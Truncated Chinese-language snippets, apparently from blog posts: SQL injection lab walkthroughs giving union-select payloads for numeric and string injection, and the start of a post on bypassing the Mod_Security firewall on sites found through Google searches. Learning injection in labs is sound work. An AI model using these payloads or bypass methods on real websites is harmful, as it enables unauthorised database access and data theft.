Level 1简单的一关,常规的联合查询注入(数字型)。
?id=1 and 1=2 union select 1,concat(user(),version),3--+
Level 2同Level 1简单,字符型注入,闭合单引号即可。
?showprofile=4' and 1=2 union select 1,user(),version(),4--+
Level 3常规字符...
记bypass Mod_Security起因Google上搜索相关SQL注入,在测试中发现使用联合查询注入时会报错
`Not Acceptable! An appropriate representation of the requested resource
could not be found on this server. This error was generated by Mo...